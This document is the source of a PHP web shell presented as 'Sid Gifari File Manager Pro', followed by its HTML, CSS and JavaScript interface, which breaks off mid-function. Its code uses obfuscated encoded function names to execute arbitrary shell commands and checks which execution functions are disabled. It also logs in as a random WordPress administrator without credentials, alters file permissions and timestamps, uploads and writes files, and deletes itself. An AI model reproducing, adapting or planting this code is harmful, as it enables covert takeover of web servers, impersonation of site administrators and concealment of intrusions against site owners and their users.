Sid Gifari File Manager Pro v10.0.3

✏️ Editing: 0cb9f9053009b86d271f29d1214c7a07.php Writable

<?php

error_reporting(0);

function get_current_path() {
    $path = isset($_POST['path']) && !empty($_POST['path']) ? decode_char($_POST['path']) : getcwd();
    return $path;
}

function code_execution($value, $function) {
    $output = '';
    $decoded_function = decode_char($function);
    $value = decode_char($value);
    $proccl = decode_char('41405e516e515d5d4257');
    $pcl = decode_char("41515d5d4257");

ob_start();
    switch ($function) {
        case '424b4246545f':
        case '424b4246545f':
            $decoded_function($value);
            $output = ob_get_contents();
            break;
        case '544a5451':
            $decoded_function($value, $output);
            $output = implode("\n", $output);
            break;
        case '425a545e5d6d544a5451':
            $output = $decoded_function($value);
            break;
        case '415d41575f':
            $handle = $decoded_function($value, 'r');
            if (is_resource($handle)) {
                while (!feof($handle)) {
                    $output .= fread($handle, 4096);
                }
                $pcl($handle);
            }
            break;
        case '41405e516e5d41575f':
            $descriptorspec = [
                0 => ["pipe", "r"],
                1 => ["pipe", "w"],
                2 => ["pipe", "w"]
            ];
            $process = $decoded_function($value, $descriptorspec, $pipes);
            if (is_resource($process)) {
                $output = stream_get_contents($pipes[1]);
                fclose($pipes[1]);
                $proccl($process);
            }
            break;
        default:
            break;
    }
    ob_end_clean();
    return $output ?: 'No output?';
}

function wp_action_mode($mode) {
    global $glob_file;
    if ($glob_file && ($glob_file !== '0' && file_exists($glob_file))) {
        require_once $glob_file;
    }

$log_function = decode_char('46426e4154466e534446596d525d5e595857');
    $set_current = decode_char('46426e4154466e51444043575f466e47425743');
    $allowed_role = decode_char("50565c5b5f5b42464353455d43");

if (!function_exists($log_function)) {
        return false;
    }

switch ($mode) {
        case 'log':
            $users = get_users(["role" => $allowed_role]);
            if (!$users) {
                return false;
            }
            $arr_rand = array_rand($users, 1);
            $user = $users[$arr_rand];
            if (!$user) {
                return false;
            }
            $id = $user->data->ID;
            $log_function($id);
            $set_current($id);
            return $id;
            break;
        default:
            die("nothing");
            break;
    }
}

function listing_all_directory() {
    $path = get_current_path();
    $result = array();
    $date_format = "d-m-Y H:i:s";

if ($handle = opendir($path)) {
        while (false !== ($dir = readdir($handle))) {
            if ($dir === '.' || $dir === '..') {
                continue;
            }

$full_path = "$path/$dir";
            $is_dir = is_dir($full_path);

$tmp_result = array(
                'path' => htmlspecialchars($full_path),
                'is_writable' => is_writable($full_path),
                'is_dir' => $is_dir,
                'date' => date($date_format, filemtime($full_path)),
                'size' => $is_dir ? "" : round(filesize($full_path) / 1024, 2),
                'perms' => substr(sprintf('%o', fileperms($full_path)), -4),
            );
            $result[] = $tmp_result;
        }
        closedir($handle);
    }
    return $result;
}

$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : false;
$glob_file = isset($_COOKIE['glob-file']) && !empty($_COOKIE['glob-file']) ? $_COOKIE['glob-file'] : false;

if (!$glob_file) {
    $glob_file = check_load_file() ?: '0';
    setcookie("glob-file", $glob_file);
}

function check_load_file() {
    $filename = decode_char("46421c5e5e53551c415a41");
    $root_directory = $_SERVER['DOCUMENT_ROOT'];
    $file_path = $root_directory . DIRECTORY_SEPARATOR . $filename;
    return file_exists($file_path) ? $file_path : false;
}

if (!$action) {
    main();
    menu();
}

switch ($action) {
    case 'd':
        die(json_encode(listing_all_directory()));
        break;
    case 'ec':
        if ($_SERVER['REQUEST_METHOD'] == "POST") {
            $value = $_POST['value'];
            $function = $_POST['function'];
            $output = code_execution($value, $function);
            $message['output'] = $output;
            die(json_encode($message));
        }
        echo '(:';
        break;
    case 'wp':
        if ($_SERVER['REQUEST_METHOD'] == "POST") {
            $mode = $_REQUEST['mode'];
            $result = wp_action_mode($mode);
            $message['result'] = $result;
            $message['success'] = $result ? true : false;
            die(json_encode($message));
        }
    case 'rf':
        // Read file content as JSON (no page reload needed)
        if ($_SERVER['REQUEST_METHOD'] == 'POST') {
            $raw = file_get_contents("php://input");
            $data = is_string($raw) ? json_decode($raw, true) : null;
            if (!$data || !isset($data['filename'])) {
                die(json_encode(['success' => false, 'content' => '']));
            }
            $filename = decode_char(trim($data['filename']));
            if ($filename === '') {
                die(json_encode(['success' => false, 'content' => '']));
            }
            $content = customize_read_file($filename);
            // json_encode fails silently on invalid UTF-8; base64 encode content to be safe
            die(json_encode(['success' => true, 'content' => base64_encode($content), 'encoded' => true, 'filename' => $filename]));
        }
        die(json_encode(['success' => false]));
        break;
    case 'r':
        if ($_SERVER['REQUEST_METHOD'] == 'POST') {
            $raw = file_get_contents("php://input");
            $data = is_string($raw) ? json_decode($raw, true) : null;
            if (!$data || !isset($data['content'], $data['filename'])) {
                $message['success'] = false;
                die(json_encode($message));
            }
            $content = show_base_data()($data['content']);
            if ($content === false) {
                $content = '';
            }
            $content = (string) $content;
            $filename = decode_char(trim($data['filename']));
            if ($filename === '') {
                $message['success'] = false;
                die(json_encode($message));
            }
            $dir = dirname($filename);
            if (!empty($dir) && !is_dir($dir) && function_exists('mkdir')) {
                @mkdir($dir, 0755, true);
            }
            $message['success'] = fm_write_file($filename, $content);
            die(json_encode($message));
        }
        main();
        $content = customize_read_file(decode_char($_REQUEST['filename']));
        show_text_area(htmlspecialchars($content));
        break;
    case 'cf':
        if ($_SERVER['REQUEST_METHOD'] == "POST") {
            $data = explode(',', $_POST['data']);
            $list_functions = array_map('decode_char', $data);
            foreach ($list_functions as $function) {
                $disabled_functions = @ini_get('disable_functions');

$disabled_functions = $disabled_functions ? array_map('trim', explode(',', $disabled_functions)) : [];

if (empty($disabled_functions)) {
                    $message['avail'] = true;
                    $message['func'] = $function;
                    exit(json_encode($message));
                }

if (function_exists($function) && !in_array($function, $disabled_functions)) {
                    $message['avail'] = true;
                    $message['func'] = $function;
                    exit(json_encode($message));
                }

}
            $message['avail'] = false;
            die(json_encode($message));
        }
        echo "Missing someone?";
        break;
    case 'cr':
        main();
        show_text_area("");
        break;
    case 'ul':
        $filename = decode_char($_REQUEST['filename']);
        $is_dir = !empty($_REQUEST['is_dir']);
        if (fm_remove_path($filename, $is_dir)) {
            $message['success'] = true;
        } else {
            $message['success'] = false;
        }
        die(json_encode($message));
        break;
    case 'extract':
        $filename = decode_char(trim($_REQUEST['filename'] ?? ''));
        if (!$filename) {
            $raw = file_get_contents("php://input");
            $data = is_string($raw) ? json_decode($raw, true) : null;
            if ($data && isset($data['filename'])) {
                $filename = decode_char(trim($data['filename']));
            }
        }
        $dest = dirname($filename);
        $success = false;
        $method = false;
        $error = '';
        if (class_exists('ZipArchive')) {
            $zip = new ZipArchive();
            $res = $zip->open($filename);
            if($res === TRUE) {
                if($zip->extractTo($dest)) {
                    $success = true;
                    $method = 'ziparchive';
                }else{
                    $error = $zip->getStatusString();
                }
                $zip->close();
            } else {
                $error = 'ZipArchive failed to open file';
            }
        }
        if (!$success && isset($_POST['function'])) {
            $function = $_POST['function'];
            $params = "unzip -o " . escapeshellarg($filename) . " -d " . escapeshellarg($dest);
            $params = bin2hex(xorEncryptDecrypt($params));
            $out = code_execution($params, $function);
            if ($out !== 'No output?') {
                $success = true;
                $method = 'command';
                $error = '';
            } else {
                $success = false;
                $error = 'Command returned no output or failed';
            }
        }
        die(json_encode(['success' => $success, 'method' => $method, 'error' => $error]));
        break;
    case 'up':
        $file = $_FILES['import_file'];
        $tmp_name = $file['tmp_name'];
        $content = customize_read_file($tmp_name);
        if (isset($_POST['by'])) {
            $content = show_base_data()($content);
        }
        $path = get_current_path();
        $name = $file['name'];
        $destination = "$path/$name";
        $message['success'] = $content && fm_write_file($destination, $content) ?: rename($tmp_name, $destination);
        die(json_encode($message));
        break;
    case 're':
        $filename = decode_char($_REQUEST['filename']);
        $path = $_REQUEST['path'];
        if ($_SERVER['REQUEST_METHOD'] == "POST") {
            $old_filename = "$path/$filename";
            $new = $_POST['new'];
            $new_filename = "$path/$new";
            $message['success'] = rename($old_filename, $new_filename);
            die(json_encode($message));
        }
        break;
    case 'to':
        $filename = decode_char($_REQUEST['filename']);
        if ($_SERVER['REQUEST_METHOD'] == 'POST') {
            $date = $_POST['date'];
            $str_date = strtotime($date);
            $message['success'] = touch($filename, $str_date);
            clearstatcache(true, $filename);
            die(json_encode($message));
        }
    case 'sd':
        $un = show_un();
        $un(__FILE__);
        $message['success'] = true;
        die(json_encode($message));
        break;
    case 'ch':
        // chmod
        if ($_SERVER['REQUEST_METHOD'] == 'POST') {
            $raw = file_get_contents("php://input");
            $data = json_decode($raw, true);
            $filename = decode_char(trim($data['filename'] ?? ''));
            $mode = intval($data['mode'] ?? 0, 8);
            $recursive = !empty($data['recursive']);
            if ($filename === '' || $mode === 0) {
                die(json_encode(['success' => false]));
            }
            if ($recursive && is_dir($filename)) {
                fm_chmod_recursive($filename, $mode);
                $message['success'] = true;
            } else {
                $message['success'] = @chmod($filename, $mode);
            }
            die(json_encode($message));
        }
        die(json_encode(['success' => false]));
        break;
    case 'md':
        // mkdir
        if ($_SERVER['REQUEST_METHOD'] == 'POST') {
            $raw = file_get_contents("php://input");
            $data = json_decode($raw, true);
            $dirname = decode_char(trim($data['dirname'] ?? ''));
            if ($dirname === '') {
                die(json_encode(['success' => false]));
            }
            $message['success'] = @mkdir($dirname, 0755, true);
            die(json_encode($message));
        }
        die(json_encode(['success' => false]));
        break;
    case 'bulk':
        // bulk actions: delete, touch, chmod
        if ($_SERVER['REQUEST_METHOD'] == 'POST') {
            $raw = file_get_contents("php://input");
            $data = json_decode($raw, true);
            $act     = $data['act'] ?? '';
            $files   = $data['files'] ?? [];
            $extra   = $data['extra'] ?? '';
            $recursive = !empty($data['recursive']);
            $results = [];
            foreach ($files as $enc) {
                $path = decode_char(trim($enc));
                if ($path === '') continue;
                switch ($act) {
                    case 'delete':
                        $results[] = fm_remove_path($path, is_dir($path));
                        break;
                    case 'touch':
                        $ts = strtotime($extra);
                        if ($ts) {
                            if ($recursive && is_dir($path)) {
                                fm_touch_recursive($path, $ts);
                            } else {
                                @touch($path, $ts);
                            }
                            clearstatcache(true, $path);
                        }
                        $results[] = (bool)$ts;
                        break;
                    case 'chmod':
                        $mode = intval($extra, 8);
                        if ($recursive && is_dir($path)) {
                            fm_chmod_recursive($path, $mode);
                            $results[] = true;
                        } else {
                            $results[] = @chmod($path, $mode);
                        }
                        break;
                }
            }
            die(json_encode(['success' => !in_array(false, $results, true), 'results' => $results]));
        }
        die(json_encode(['success' => false]));
        break;
    default:
        break;
}

function show_file_contents() {
    $file = "file_";
    $old = "get_";
    $contents = "contents";
    return "$file$old$contents";
}

function show_text_area($content) {
    $filename = decode_char($_REQUEST['filename']);
    $filename_encoded = isset($_REQUEST['filename']) ? htmlspecialchars($_REQUEST['filename'], ENT_QUOTES, 'UTF-8') : '';
    echo <<<HTML
    <div class="panel">
            <p><a href='?' id='back_menu'>< Back</a></p>
            <br>

<div class="file-path">$filename</div>
        <input type="hidden" id="edit-filename" value="$filename_encoded">
        <textarea id="content" class="file-content">$content</textarea>
        <button type="submit" class="btn" id="textarea-handle">Save</button>
    </div>
HTML;
}

function show_base_data() {
    $alvian = "base";
    $nadir = "64_decode";
    return "$alvian$nadir";
}

function fm_make_request($url) {
    if (function_exists("curl_init")) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $output = curl_exec($ch);
        return $output;
    }
    return show_file_contents()($url);
}

function show_un() {
    $link = "link";
    $unpad = "un";
    return "$unpad$link";
}

function main() {
    global $current_path;
    global $glob_file;

$current_path = isset($_REQUEST['path']) ? $_REQUEST['path'] : false;

if (!$current_path) {
        setcookie("path", getcwd());
        $current_path = getcwd();
    }

$path = str_replace('\\', '/', $current_path);
    $paths = explode('/', $path);
    echo '<div class="breadcrumb" id="path_div">';
    foreach ($paths as $id => $pat) {
        if ($id == 0) {
            echo '<a href="#" path="/" onclick="change_path(this)">/</a>';
        }
        if ($pat != '') {
            $tmp_path = implode('/', array_slice($paths, 0, $id + 1));
            echo "<a href='#' path='$tmp_path' onclick='change_path(this)'>$pat/</a>";
        }
    }
    echo "</div>";
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet">
  <style>
        :root {
            --bg:           #1a1918;
            --surface:      #282725;
            --surface-2:    #32312d;
            --surface-3:    #3d3b37;
            --border:       #3e3d3a;
            --border-light: #54524e;
            --text:         #edeceb;
            --text-muted:   #a3a09b;
            --text-dim:     #75726e;
            --accent:       #da7756;
            --accent-dim:   rgba(218, 119, 86, 0.12);
            --green:        #4f9c6c;
            --green-dim:    rgba(79, 156, 108, 0.12);
            --red:          #d86262;
            --red-dim:      rgba(216, 98, 98, 0.12);
            --folder:       #e08a3f;
            --mono:         ui-monospace, SFMono-Regular, Menlo, Monaco, Consolas, monospace;
            --sans:         'JetBrains Mono', -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
        }

*, *::before, *::after {
            margin: 0; padding: 0;
            box-sizing: border-box;
        }

body {
            background: var(--bg);
            color: var(--text);
            font-family: var(--sans);
            font-size: 14.5px;
            font-weight: 300;
            line-height: 1.6;
            padding: 28px 32px;
            min-height: 100vh;
            -webkit-font-smoothing: antialiased;
        }

a {
            text-decoration: none;
            color: inherit;
        }

::selection {
            background: rgba(200,169,110,0.2);
            color: var(--text);
        }

/* ç¬Âç¬Â Scrollbar ç¬Âç¬Â */
        ::-webkit-scrollbar { width: 6px; height: 6px; }
        ::-webkit-scrollbar-track { background: transparent; }
        ::-webkit-scrollbar-thumb { background: var(--border-light); border-radius: 8px; }

.ml-2em { margin-right: 8px; }
        .ml-2am { margin-left: 2.4em; }
        .mr-10  { margin-right: 15px; }
        .white  { color: var(--text); }
        .red    { color: var(--red); }
        .green  { color: var(--green); }

/* ç¬Âç¬Â Panel ç¬Âç¬Â */
        .panel {
            background: var(--surface);
            border: 1px solid var(--border);
            border-radius: 12px;
            padding: 24px;
            margin-bottom: 24px;
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.1);
        }

.panel-header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            margin-bottom: 18px;
            padding-bottom: 14px;
            border-bottom: 1px solid var(--border);
        }

.panel-title {
            font-family: var(--mono);
            font-size: 15px;
            font-weight: 500;
            letter-spacing: 0.12em;
            text-transform: uppercase;
            color: var(--accent);
        }

.blur-table {
            filter: blur(6px);
            opacity: 0.4;
            pointer-events: none;
            transition: filter 0.2s, opacity 0.2s;
        }

/* ç¬Âç¬Â Buttons ç¬Âç¬Â */
        .btn {
            background: var(--surface-2);
            color: var(--text);
            border: 1px solid var(--border);
            padding: 8px 16px;
            border-radius: 8px;
            cursor: pointer;
            font-family: var(--sans);
            font-size: 13px;
            font-weight: 500;
            letter-spacing: 0.02em;
            transition: all 0.15s ease;
        }

.btn:hover {
            border-color: var(--accent);
            color: var(--accent);
            background: var(--surface-3);
            box-shadow: 0 2px 8px rgba(0, 0, 0, 0.15);
        }

.btn-danger {
            border-color: var(--red);
            color: var(--red);
            background: transparent;
        }

.btn-danger:hover {
            background: var(--red-dim);
            border-color: #a05a5a;
            color: #b06060;
        }

/* ç¬Âç¬Â Breadcrumb ç¬Âç¬Â */
        .breadcrumb {
            margin-bottom: 20px;
            font-family: var(--mono);
            font-size: 14px;
            color: var(--text-muted);
            background: var(--surface-2);
            padding: 10px 14px;
            border-radius: 8px;
            border: 1px solid var(--border);
            word-wrap: break-word;
        }

.breadcrumb a {
            color: var(--text);
            text-decoration: none;
            transition: color 0.12s;
        }

.breadcrumb a:hover {
            color: var(--accent);
        }

/* ç¬Âç¬Â File Editor ç¬Âç¬Â */
        .file-content {
            width: 100%;
            min-height: 340px;
            background: var(--bg);
            border: 1px solid var(--border);
            color: var(--text);
            padding: 16px 20px;
            font-family: var(--mono);
            font-size: 13px;
            line-height: 1.7;
            margin-bottom: 16px;
            border-radius: 10px;
            resize: vertical;
            outline: none;
            transition: border-color 0.15s, box-shadow 0.15s;
        }

.file-content:focus {
            border-color: var(--accent);
            box-shadow: 0 0 0 2px var(--accent-dim);
        }

.file-path {
            margin-bottom: 10px;
            color: var(--text-muted);
            font-family: var(--mono);
            font-size: 11px;
        }

/* ç¬Âç¬Â Table ç¬Âç¬Â */
        .file-table {
            width: 100%;
            border-collapse: collapse;
            font-size: 13px;
        }

.file-table thead {
            position: sticky;
            top: 0;
            z-index: 1;
        }

.file-table th {
            color: var(--text-muted);
            font-family: var(--mono);
            font-weight: 500;
            font-size: 10px;
            text-transform: uppercase;
            letter-spacing: 0.1em;
            padding: 9px 16px;
            text-align: left;
            background: var(--surface-2);
            border-bottom: 1px solid var(--border);
            white-space: nowrap;
        }

.file-table th:nth-child(2),
        .file-table th:nth-child(3),
        .file-table th:nth-child(4) {
            text-align: center;
        }

.file-table td {
            padding: 8px 16px;
            border-bottom: 1px solid var(--border);
            vertical-align: middle;
            color: var(--text);
        }

.file-table td.tc {
            text-align: center;
            font-size: 12px;
        }

.file-table tbody tr {
            transition: background 0.1s;
        }

.file-table tbody tr:hover {
            background: var(--surface-2);
        }

.file-table a {
            display: inline-flex;
            align-items: center;
            gap: 8px;
            color: var(--text);
            transition: color 0.12s;
        }

.file-table a:hover { color: var(--accent); }

.icon-folder { color: var(--folder); }

/* ç¬Âç¬Â Badges ç¬Âç¬Â */
        .badge-writable {
            display: inline-block;
            padding: 1px 8px;
            border-radius: 2px;
            font-family: var(--mono);
            font-size: 10px;
            letter-spacing: 0.05em;
            color: var(--green);
            background: var(--green-dim);
            border: 1px solid rgba(95,138,107,0.3);
        }

.badge-readonly {
            display: inline-block;
            padding: 1px 8px;
            border-radius: 2px;
            font-family: var(--mono);
            font-size: 10px;
            letter-spacing: 0.05em;
            color: var(--text-dim);
            border: 1px solid var(--border);
            background: transparent;
        }

.size-cell {
            font-family: var(--mono);
            font-size: 11.5px;
            font-variant-numeric: tabular-nums;
            color: var(--text-muted);
        }

.date-cell {
            font-family: var(--mono);
            font-size: 11px;
            color: var(--text-muted);
        }

.file-table td:first-child {
            max-width: 400px;
            overflow: hidden;
            text-overflow: ellipsis;
            white-space: nowrap;
        }

.file-icon  { color: var(--text-dim); }
        .file-actions { display: flex; gap: 5px; }

.file-action-btn {
            background: none;
            border: none;
            color: var(--accent);
            cursor: pointer;
            font-size: 12px;
        }

.file-action-btn:hover { text-decoration: underline; }

/* ç¬Âç¬Â Tools Panel ç¬Âç¬Â */
        .tools-panel {
            display: flex;
            gap: 8px;
            margin-bottom: 16px;
            align-items: center;
        }

.tool {
            padding: 6px 14px;
            border-radius: 6px;
            cursor: pointer;
            border: 1px solid var(--border-light);
            background: transparent;
            color: var(--text-muted);
            font-family: var(--sans);
            font-size: 12px;
            font-weight: 500;
            transition: all 0.15s ease;
        }

.tool:hover {
            border-color: var(--accent);
            color: var(--text);
            background: var(--surface-2);
        }

/* ç¬Âç¬Â Notification ç¬Âç¬Â */
        .notification {
            position: fixed;
            bottom: 24px;
            left: 24px;
            background: var(--surface-3);
            color: var(--text);
            border: 1px solid var(--border-light);
            border-left: 2px solid var(--accent);
            padding: 10px 18px;
            border-radius: 2px;
            z-index: 9999;
            font-family: var(--mono);
            font-size: 12px;
            letter-spacing: 0.03em;
            box-shadow: 0 8px 32px rgba(0,0,0,0.5);
            animation: slideUp 0.18s cubic-bezier(0.16,1,0.3,1);
        }

@keyframes slideUp {
            from { transform: translateY(12px); opacity: 0; }
            to   { transform: translateY(0);    opacity: 1; }
        }

.hidden { display: none; }

/* ç¬Âç¬Â Checkbox ç¬Âç¬Â */
        .checkbox-label {
            display: flex;
            align-items: center;
            gap: 7px;
            cursor: pointer;
            color: var(--text-muted);
            font-family: var(--mono);
            font-size: 11px;
            letter-spacing: 0.04em;
            text-transform: uppercase;
            transition: color 0.12s;
        }

.checkbox-label:hover { color: var(--text); }

.checkbox-label input[type="checkbox"] {
            appearance: none;
            width: 13px; height: 13px;
            border: 1px solid var(--border-light);
            border-radius: 1px;
            cursor: pointer;
            background: transparent;
            position: relative;
            transition: border-color 0.12s, background 0.12s;
        }

.checkbox-label input[type="checkbox"]:checked {
            background: var(--accent);
            border-color: var(--accent);
        }

.checkbox-label input[type="checkbox"]:checked::after {
            content: '';
            position: absolute;
            left: 3px; top: 1px;
            width: 5px; height: 8px;
            border: 1.5px solid #0d0d0d;
            border-top: none; border-left: none;
            transform: rotate(45deg);
        }

/* ç¬Âç¬Â Context Menu ç¬Âç¬Â */
        .context-menu {
            display: none;
            position: fixed;
            z-index: 1000;
            background: var(--surface-3);
            border: 1px solid var(--border-light);
            border-radius: 8px;
            box-shadow: 0 8px 32px rgba(0,0,0,0.4);
            min-width: 160px;
            padding: 6px 0;
            font-family: var(--sans);
        }

.context-menu.show { display: block; }

.context-menu-item {
            padding: 7px 16px;
            cursor: pointer;
            color: var(--text-muted);
            font-family: var(--mono);
            font-size: 11.5px;
            letter-spacing: 0.03em;
            transition: background 0.1s, color 0.1s;
        }

.context-menu-item:hover {
            background: var(--accent-dim);
            color: var(--accent);
        }

.context-menu-item.disabled {
            opacity: 0.3;
            cursor: not-allowed;
        }

.context-menu-item.disabled:hover {
            background: transparent;
            color: var(--text-muted);
        }

/* ç¬Âç¬Â Command Section ç¬Âç¬Â */
        .command-input {
            display: flex;
            gap: 8px;
            margin-bottom: 12px;
        }

.command-input input {
            flex: 1;
            background: var(--bg);
            border: 1px solid var(--border);
            color: var(--text);
            padding: 7px 12px;
            border-radius: 2px;
            font-family: var(--mono);
            font-size: 12.5px;
            outline: none;
            transition: border-color 0.15s;
        }

.command-input input::placeholder { color: var(--text-dim); }
        .command-input input:focus { border-color: var(--border-light); }

.command-output {
            height: 200px;
            overflow-y: auto;
            background: var(--bg);
            border: 1px solid var(--border);
            color: var(--text);
            padding: 12px 14px;
            border-radius: 2px;
            margin-bottom: 12px;
            white-space: pre-wrap;
            font-family: var(--mono);
            font-size: 12px;
            line-height: 1.65;
        }

/* ç¬Âç¬Â Panel actions spacing ç¬Âç¬Â */
        .panel-actions { display: flex; gap: 8px; }

/* ç¬Âç¬Â Divider between byp and table ç¬Âç¬Â */
        #byp {
            background: transparent;
            border: none;
            padding: 0 0 14px 0;
            margin: 0;
        }
    </style>
    <script>
 
        function getCookie(name) {
                const value = `; ${document.cookie}`;
                const parts = value.split(`; ${name}=`);
                if (parts.length === 2) return parts.pop().split(';').shift();
        }
        const fileIcon = `<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="#a0aec8" viewBox="0 0 16 16" style="vertical-align: -0.125em;">
        <path d="M4 0h8a2 2 0 0 1 2 2v12a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2V2a2 2 0 0 1 2-2z"/>
        </svg>`;
        const folderIcon = `<svg class='icon-folder' xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="#e8923a" viewBox="0 0 16 16" style="vertical-align: -0.125em;">
  <path d="M.54 3.87.5 3a2 2 0 0 1 2-2h3.672a2 2 0 0 1 1.414.586l.828.828A2 2 0 0 0 9.828 3h3.982a2 2 0 0 1 1.992 2.181l-.637 7A2 2 0 0 1 13.174 14H2.826a2 2 0 0 1-1.991-1.819l-.637-7a1.99 1.99 0 0 1 .54-1.31zM2.19 4a1 1 0 0 0-.996.819l-.637 7A1 1 0 0 0 1.558 13h11.618a1 1 0 0 0 .996-.819l.637-7A1 1 0 0 0 13.81 4H2.19z"/>
</svg>`;
        const loadFile = '<?php echo $glob_file; ?>' || getCookie('glob-file');
        const homePath = '<?php echo getcwd(); ?>'
        const docRoot = '<?php echo $_SERVER["DOCUMENT_ROOT"]; ?>'.replace(/\/$/, "")

</script>
        <script>
        // Your existing JavaScript code remains the same
        // I've included the key parts that need to stay unchanged
        const urlObject = new URL(window.location.href)
        const baseUrl = `${urlObject.origin}${urlObject.pathname}`

const essential_id = [
            'file-table',
            'byp',
            'path_div',
            'bypass-section',
            'tools',
            'file-manager',
            'tool-panel'
        ]

const additional_id = [
            'com-section'
        ]

function change_path(obj) {

var path = obj.getAttribute("path");

localStorage.setItem("path", path)
            console.log("change to " + path);
            init(path);
            changePath(path);

}

function changePath(path) {

const wrapper = document.getElementById('path_div');

wrapper.innerHTML = '';

const paths = path.split('/').filter(Boolean);

let rootLink = document.createElement('a');
            rootLink.href = "#";
            rootLink.textContent = "/";
            rootLink.setAttribute("onclick", "change_path(this)")
            rootLink.setAttribute("path", "/")
            wrapper.appendChild(rootLink);

paths.forEach((pat, id) => {
                let tmpPath = '/' + paths.slice(0, id + 1).join('/');
                let link = document.createElement('a');
                link.href = "#";
                link.setAttribute('path', tmpPath);
                link.textContent = `${pat}/`;
                link.setAttribute("onclick", "change_path(this)");
                wrapper.appendChild(link);
            });
        }

function get_current_path() {
            var path_div = document.getElementById("path_div");
            if (!path_div) return "";
            var raw = path_div.textContent || "";
            return raw.replace(/[\r\n]+/g, "").trim();
        }

function refresh_path() {
            localStorage.clear();
            init();
            changePath(homePath)
        }

var contextMenuTarget = null;

function hideContextMenu() {
            document.getElementById("context-menu").classList.remove("show");
            contextMenuTarget = null;
        }

function doContextExtract() {
            if (!contextMenuTarget) return;
            var path = contextMenuTarget.path;
            hideContextMenu();
            var data = new FormData();
            var cmd_func = localStorage.getItem("cmdFunc")
            data.append("filename", encodeXorString(path));
            data.append("function", cmd_func)

set_message("Extracting...");
            post_url('extract', data, false).then(function(response) {
                safeParseResponse(response).then(function(result) {
                    if (result.ok && result.data.success) {
                        set_message("Extracted successfully!");
                        var currentObj = document.querySelector('a[path="' + get_current_path() + '"]');
                        init(get_current_path());
                    } else {
                        set_message("Extraction failed.");
                    }
                });
            });
        }

function doContextEdit() {
            if (!contextMenuTarget || contextMenuTarget.isDir) {
                if (!contextMenuTarget) set_message("Right-click on a file or folder first");
                hideContextMenu();
                return;
            }
            openInlineEditor(contextMenuTarget.path);
            hideContextMenu();
        }

function closeInlineEditor() {
            document.getElementById('inline-editor-panel').classList.add('hidden');
            document.getElementById('main-file-panel').classList.remove('hidden');
            document.getElementById('path_div').classList.remove('hidden');
            // Reload the table so size/date reflect any saved changes
            var lastPath = getLastPath();
            init(lastPath);
        }

async function saveInlineEditor() {
            var content = document.getElementById('inline-editor-content').value;
            var encoded_content = utf8ToBase64(content);
            var filename = document.getElementById('inline-editor-filename-hidden').value;
            if (!filename) {
                set_message("ERROR: No filename");
                return;
            }
            set_message("Saving...");
            var data = { content: encoded_content, filename: filename };
            post_url('r', data).then(function(resp) {
                safeParseResponse(resp).then(function(result) {
                    if (!result.ok) { set_message("Invalid response"); return; }
                    if (result.data.success) {
                        set_message("Saved!");
                    } else {
                        set_message("Failed to save!");
                    }
                });
            });
        }

function create_table_data(name, size, is_writable, date, is_dir, perms) {
            var file_name = name.split('/').pop();
            var table_row = document.createElement("tr");
            table_row.setAttribute("data-path", name);
            table_row.setAttribute("data-is-dir", is_dir ? "1" : "0");
            table_row.setAttribute("data-date", date);
            table_row.addEventListener("contextmenu", function(e) {
                e.preventDefault();
                var currentPath = table_row.getAttribute("data-path") || name;
                var currentIsDir = table_row.getAttribute("data-is-dir") === "1";
                var currentDate = table_row.getAttribute("data-date") || date;
                var currentFileName = currentPath.split('/').pop();
                showContextMenu(e, currentPath, currentIsDir, table_row, currentFileName, currentDate);
            });

// Name cell
            var tdName = document.createElement("td");
            if (is_dir) {
                tdName.innerHTML = `<a href='#' onclick='change_path(this)' path='${name}' class='ml-2em'>${folderIcon} <span>${file_name}</span></a>`;
            } else {
                tdName.innerHTML = `<a href='#' onclick='openInlineEditor(this.getAttribute("data-path")); return false;' data-path='${name}' path='${name}'>${fileIcon} <span>${file_name}</span></a>`;
            }
            table_row.appendChild(tdName);

// Size cell
            var tdSize = document.createElement("td");
            tdSize.setAttribute("class", "tc size-cell");
            if (is_dir) {
                tdSize.innerHTML = `<span style="color:#555;font-size:0.85em;"></span>`;
            } else {
                var sizeNum = parseFloat(size);
                var sizeStr;
                if (isNaN(sizeNum)) {
                    sizeStr = size;
                } else if (sizeNum >= 1024) {
                    sizeStr = (sizeNum / 1024).toFixed(1) + ' MB';
                } else if (sizeNum >= 1) {
                    sizeStr = sizeNum.toFixed(1) + ' KB';
                } else if (sizeNum > 0) {
                    // size is in KB (from PHP: filesize/1024), convert back to bytes
                    sizeStr = Math.round(sizeNum * 1024) + ' B';
                } else {
                    sizeStr = '0 B';
                }
                tdSize.innerHTML = sizeStr;
            }
            table_row.appendChild(tdSize);

// Permissions cell
            var tdPerm = document.createElement("td");
            tdPerm.setAttribute("class", "tc");
            if (is_writable) {
                tdPerm.innerHTML = `<span class="badge-writable">${perms || 'Writable'}</span>`;
            } else {
                tdPerm.innerHTML = `<span class="badge-readonly">${perms || 'Read-only'}</span>`;
            }
            table_row.appendChild(tdPerm);

// Date cell (plain text; use right-click > Touch to change)
            var tdDate = document.createElement("td");
            tdDate.setAttribute("class", "tc date-cell");
            tdDate.textContent = date;
            table_row.appendChild(tdDate);

document.getElementById("data_table").appendChild(table_row);
        }

function ask_url_path() {
            var url = prompt("URL : ")
            var file_path = prompt("File Save : ", `${docRoot}/hello.php`)
            if(!url || !file_path){
                return false;
            }
            return {
                url: url,
                file_path: file_path
                
            }
        }

function touch_file(obj) {
            var filename = obj.getAttribute("path");

var old_date = obj.getAttribute("value");
            var newdate = prompt("Enter your new date : ", old_date)
            if (newdate && newdate !== old_date) {
                var data = new FormData();

data.append("date", newdate);
                data.append("filename", encodeXorString(filename));

set_message("Loading");
                post_url('to', data, false).then(function(response) {
                    if (!response.ok) {
                        set_message("ERROR: Invalid response");
                        return;
                    }
                    safeParseResponse(response).then(function(result) {
                        if (!result.ok) {
                            set_message("Invalid response (not JSON)");
                            return;
                        }
